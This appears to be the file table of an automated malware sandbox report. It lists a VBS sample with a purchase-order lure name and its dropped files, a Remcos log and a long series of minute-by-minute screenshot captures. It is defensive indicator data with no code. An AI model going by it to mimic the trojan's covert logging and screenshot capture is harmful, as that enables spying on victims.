Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
RFQ.NO. S70-23Q-1474-CS-P.vbs
|
ASCII text, with very long lines (407), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165008.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165108.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165208.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165309.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165410.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165510.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165613.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165713.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165813.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165913.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170013.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170114.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170214.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170314.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170414.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170514.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170614.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170714.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170814.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170914.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171014.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171115.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171215.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171315.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171415.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171515.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171615.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171715.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171815.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171915.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172015.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172115.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172215.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172315.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172416.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172516.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172616.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172716.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172816.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172916.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173016.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173116.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173216.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173316.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173416.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173517.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173617.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173717.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173817.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173917.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174017.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174117.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174217.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174317.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174417.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174517.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174617.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174718.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174818.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174918.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175018.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175118.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175218.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175318.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175418.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175518.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175618.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175718.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175818.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175919.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180019.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180119.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180219.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180319.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180419.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180519.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180619.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180719.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180819.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180920.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181020.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181120.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181220.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181320.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181420.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181520.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181621.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181721.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181821.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181922.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182023.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182123.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182223.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182323.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182423.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182523.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182623.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182723.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182823.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182923.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183023.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183123.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183224.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183324.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183424.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183524.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183624.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183724.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183824.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183924.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184024.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184124.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184224.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184324.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184424.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184525.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184625.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184725.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184825.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184925.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185025.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185125.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185225.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185325.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185425.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185526.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185626.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185726.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185826.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185926.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190026.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190126.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190226.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190326.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190426.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190526.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190626.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190726.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190827.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190927.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191027.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191127.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191227.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191327.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191427.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191527.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191627.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191727.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191827.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191927.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192028.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192128.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192228.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192328.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192428.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192528.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192628.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192728.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192828.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192928.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193028.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193129.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193229.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193329.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193429.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193529.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193629.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193729.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193829.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193929.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194029.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194130.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194230.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194330.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194430.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194531.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194631.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194731.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194831.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194931.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195031.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195131.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195231.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195331.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195431.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195532.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195632.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195732.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195832.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195933.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200033.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200133.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200233.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200333.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200433.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200533.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200634.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200734.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200835.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200935.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201035.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201135.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201235.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201336.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201436.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201536.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201636.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201736.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201836.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201938.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202038.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202138.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202238.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202339.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202439.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202539.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202639.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202739.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202841.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202941.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203041.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203141.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203242.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203342.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203442.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203542.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203643.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203743.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203845.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203945.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204045.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204145.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204246.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204346.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204446.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204546.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204648.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204748.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204849.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204949.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205049.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205150.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205250.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205350.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205452.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205553.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205653.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205754.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205854.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205954.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210057.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210157.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210258.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210358.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210458.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210559.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210701.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210801.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210902.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211002.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211102.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211205.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211306.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211406.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211509.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211609.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211709.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211810.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211910.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212013.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212113.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212214.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212317.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212417.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212518.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212618.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212721.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212822.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212922.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213025.dat
|
data
|
dropped
|
|
|
|
